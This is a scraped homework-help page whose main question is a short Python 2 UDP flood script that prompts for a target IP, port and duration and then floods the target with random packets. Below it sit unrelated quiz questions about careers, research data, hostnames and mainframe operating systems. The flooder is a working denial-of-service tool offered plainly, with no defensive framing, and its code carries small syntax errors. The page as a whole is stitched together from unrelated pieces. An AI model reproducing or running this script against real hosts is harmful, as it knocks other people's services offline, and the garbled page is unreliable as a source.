subject

Import os import sys
import time
import socket
import random

sock = socket. socket(socket. AF_INET, socket. SOCK_DGRAM)

bytes = random._urandom(1024)

os. system("clear")
ip = raw_input("Target's IP: ")
port = input("Port: ")
dur = input("Time: ")
timeout = time. time() + dur
sent = 0

while True:
try:
if time. time() > timeout:
break
else:
pass
sock. sendto(bytes,(ip, port))
sent = sent + 1
print("Sent %s packets to %s through port %s"%(sent, ip, port)

ansver
Answers: 1

Another question on Computers and Technology

question
Computers and Technology, 24.06.2019 14:00
Which describes careers that have similar education requirements but different qualifications? product safety engineers and materials engineers industrial safety engineers and industrial health engineers quality control systems managers and inspectors industrial safety and health engineers and hand packers
Answers: 3
question
Computers and Technology, 25.06.2019 08:00
In researching his history report about the civil war, why is ariq most likely to use secondary data than primary data? secondary data provides a starting point to find primary data. secondary data is easier and less time consuming to find. secondary data is always more reliable and credible. secondary data eliminates the need for other research.
Answers: 1
question
Computers and Technology, 25.06.2019 16:00
|the entire hostname has a maximum of
Answers: 1
question
Computers and Technology, 25.06.2019 22:30
If you were working on a mainframe, which of the following operating systems would you most likely be using? linuxmacintoshmicrosoft windowsunix
Answers: 1
You know the right answer?
Import os import sys
import time
import socket
import random

sock = socke...
Questions
question
Mathematics, 10.07.2019 04:10
question
World Languages, 10.07.2019 04:10
Questions on the website: 13722367